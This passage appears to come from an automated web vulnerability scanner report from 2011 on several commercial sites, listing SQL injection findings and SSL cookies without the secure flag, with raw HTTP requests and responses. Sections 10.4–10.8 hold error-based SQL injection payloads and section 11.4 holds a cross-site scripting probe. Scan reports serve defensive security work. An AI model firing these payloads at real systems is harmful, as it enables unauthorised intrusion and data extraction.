Set-Cookie: JSESSIONID=2p9QN1GJ2Z3S12xNCxQXlL1Sv9knyGTvcHGHKQhgRRLQvyzhppkLn91h0g3vBgYBjvYSZNXQykRX2kdnyQtQ3vxTgnKhjWyvZHZrDRvvmfT79J0vzSz4Lp1DGswvblyw!-1046013267; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11320

<html><head><title>NetSuite | Page Not Found</title>
<meta name="robots" content="noindex,nofollow">
<link rel="STYLESHEET" type="text/css" href="/pages/portal/css/main.css">
</head>
<body bgcolor
...[SNIP]...

10.4. https://checkout.netsuite.com/s.nl previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://checkout.netsuite.com
Path:	/s.nl

Request

GET /s.nl?c=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&sc=4&whence=3&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
Location: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 339

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://checkout.netsuite.com/page
...[SNIP]...

10.5. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Request

POST /asp/home/login.asp HTTP/1.1
Referer: https://employer.unicru.com/asp/home/login.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: employer.unicru.com
Cookie: ASPSESSIONIDSSRCBTSB=CEAKPIJCCMCNNEOHIFEHAOEN; KTMDWestLB=1211368202.20736.0000; ASPSESSIONIDSSRADQTB=BCMNMKJCKPMBDHCEEMCKNLDG; Emp=datpwx=&UN=u662%3A%2F%2F0r652n4xr4%2Ep1z%2F0&SkipSSL=&PT=&CNAME=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&CID=&MultipleLocation=&RowsPerPage=&EUID=
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 201

image1=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&txtPassword=3&txtUsername=Smith

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:40:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Content-Length: 3924
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=fzv6u&SkipSSL=&PT=&CNAME=UnicruEmployer&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&CID=&MultipleLocation=&RowsPerPage=&EUID=; path=/
Cache-control: private

<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...

10.6. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Request

GET /hmc/report/?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...

10.7. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Request

GET /hmc/report/index.cfm?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

10.8. http://learn.shavlik.com/shavlik/index.cfm previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://learn.shavlik.com
Path:	/shavlik/index.cfm

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:26:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

...[SNIP]...

11. SSL cookie without secure flag set previous next
There are 27 instances of this issue:

https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl
https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl
https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl
https://checkout.netsuite.com/core/
https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl
https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl
https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl
https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl
https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl
https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl
https://checkout.netsuite.com/core/styles/pagestyles.nl
https://checkout.netsuite.com/pages/portal/css/main.css
https://checkout.netsuite.com/pages/portal/page_not_found.jsp
https://checkout.netsuite.com/s.nl
https://customer.kronos.com/Default.asp
https://employer.unicru.com/asp/home/login.asp
https://employer.unicru.com/asp/home/login.asp
https://employer.unicru.com/asp/home/login.asp
https://employer.unicru.com/asp/home/login.asp
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/index.cfm
https://www.fusionvm.com/FusionVM/
https://checkout.netsuite.com/s
https://customer.kronos.com/Default.asp
https://customer.kronos.com/user/forgotpassword.asp
https://customer.kronos.com/user/forgotusername.asp
https://customer.kronos.com/user/logindenied.asp

11.1. https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=L0xGN1TCcVCQPS8pHhg9qBGd76gpyCfS7FnHbzfnFl2LQNGjJvrzfh6fNyfBxr6h2LllvDnWDV1VRT3fh8GLJQYNFyskhxdG51gGXN5XF7N0GMrVt0mxL6vQyQSnT8pW!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:09:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2144347290:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=L0xGN1TCcVCQPS8pHhg9qBGd76gpyCfS7FnHbzfnFl2LQNGjJvrzfh6fNyfBxr6h2LllvDnWDV1VRT3fh8GLJQYNFyskhxdG51gGXN5XF7N0GMrVt0mxL6vQyQSnT8pW!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.2. https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=2RW7N1TCBHr6mQJSv4MJrzV9rnyz359DTygvK7qTzvf13vCc2x2x2JXm5QLhrNbJJQcTCgFLGHhsGp0VQ7FwRJ4b5TpDvcFrLL1Jh18S7vw1h5R7dYbgwShCL6v1QX0C!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:48 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2000683563:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2RW7N1TCBHr6mQJSv4MJrzV9rnyz359DTygvK7qTzvf13vCc2x2x2JXm5QLhrNbJJQcTCgFLGHhsGp0VQ7FwRJ4b5TpDvcFrLL1Jh18S7vw1h5R7dYbgwShCL6v1QX0C!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.3. https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=6gtrN1TV8C9xXWGTLVWNMvDTBLMyV755hCYflZPh1YC9G3WhlHnpqmr03yRfTfPYQpX2lCD12TQ2p4sh2qzn2CRFHBYp2ypxXQ0Ts2HJkxK7TM4GT0WGNXlr2vhsWDqh!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparkerd83f087f78ee474db97e8aec33de63c2.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:10:47 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110553779:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=6gtrN1TV8C9xXWGTLVWNMvDTBLMyV755hCYflZPh1YC9G3WhlHnpqmr03yRfTfPYQpX2lCD12TQ2p4sh2qzn2CRFHBYp2ypxXQ0Ts2HJkxK7TM4GT0WGNXlr2vhsWDqh!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.4. https://checkout.netsuite.com/core/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=hWd4N1GZGdsflwhjP8VdVGSnB6r2GzJ3SBh92hgS8gqlwWGNvByZJhtmP17wL8Hj9JwLc1dn5gjrrtXLMVZXhDnw7vvQwTP4mMBtPt3ds55G4vp4gF1Zr97r3DHpyLCR!-1220802186; path=/
NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:27:05 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /core/?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000013)%3C%2Fscript%3E HTTP/1.1
Referer: https://checkout.netsuite.com/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=31PwN1GWQvkMGP2pxGGpgHN2m48g811ybT9HCcv4R2jvLCt8R9y21ywBzs7v4v6KSnRPhyDpZb218XYJ9jkhnLpJpr8m7pxCsyyXnPNz1ChxGGXdMyLzThLVm6jGBpVG!1490567172; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:05 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 333241087:616363742D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=hWd4N1GZGdsflwhjP8VdVGSnB6r2GzJ3SBh92hgS8gqlwWGNvByZJhtmP17wL8Hj9JwLc1dn5gjrrtXLMVZXhDnw7vvQwTP4mMBtPt3ds55G4vp4gF1Zr97r3DHpyLCR!-1220802186; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:27:05 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2650

<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...

11.5. https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=9pncN1TcCnWLkfJJbLpSq1RR7PL6tyTTw0hR5QMhqLwnSDCyGTFJxJhYwyJYDpG2wJdSpSJy1FLV6lXT1thXwK1jrhJvlSP8KCMDHGZd8DVZ2nQZC2pLR3HTpPgQDCQp!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:08:12 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368749109:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=9pncN1TcCnWLkfJJbLpSq1RR7PL6tyTTw0hR5QMhqLwnSDCyGTFJxJhYwyJYDpG2wJdSpSJy1FLV6lXT1thXwK1jrhJvlSP8KCMDHGZd8DVZ2nQZC2pLR3HTpPgQDCQp!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.6. https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=JwDGN1TRX3qFJhPv0tBSnhLkTmpW34vhDRvgTkwqLXK4SnvMG3VM1xdGYpsFmKLXPJGL5yG5Lk8PK7KS4HKnfNNzcdJH2J9GRhFDsWdQlvhZyXNFZGnBbnGLKb2GLgXj!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:31 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -812652053:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=JwDGN1TRX3qFJhPv0tBSnhLkTmpW34vhDRvgTkwqLXK4SnvMG3VM1xdGYpsFmKLXPJGL5yG5Lk8PK7KS4HKnfNNzcdJH2J9GRhFDsWdQlvhZyXNFZGnBbnGLKb2GLgXj!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.7. https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=C9RcN1TT8snZLj3J8hCcFmJpQ654HjYQZ4F5LCvBvTZ29f1ZnThL0wQpBFWf522QQvf7TN89dBTvLfjsSzfJD1yGKG3D0xhy3Ryv7M0c6rzkzZB1SlWMFLwchzvhwnV2!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:09:35 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110558500:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=C9RcN1TT8snZLj3J8hCcFmJpQ654HjYQZ4F5LCvBvTZ29f1ZnThL0wQpBFWf522QQvf7TN89dBTvLfjsSzfJD1yGKG3D0xhy3Ryv7M0c6rzkzZB1SlWMFLwchzvhwnV2!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.8. https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=MKB8N1NDfnQgHZLLbYDLh4z8yFybC5QDpN14nhTHyDDLBGWlh1d9yCB5hmlfvFCpH1Y1YByvTLKmHv2s5tFSs0FxbnfmZJM1Zpdqds57MzgTGCMyNN5C3zzpW0WtRYhQ!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AYQCDmZk; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:04:40 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110576631:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=MKB8N1NDfnQgHZLLbYDLh4z8yFybC5QDpN14nhTHyDDLBGWlh1d9yCB5hmlfvFCpH1Y1YByvTLKmHv2s5tFSs0FxbnfmZJM1Zpdqds57MzgTGCMyNN5C3zzpW0WtRYhQ!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.9. https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=kpy0N1TTsKDkPgBGQZchFwhNP2xxQDtJvfwQVvtynWwgQLL0vwPLg1KTvflJQHp8yCnphBG9nfKqGrnvy0Cy2pxD6Br4LW1B7KYyndJyk1mBF7whWgydLzFw85SwJwvl!-979559123; path=/

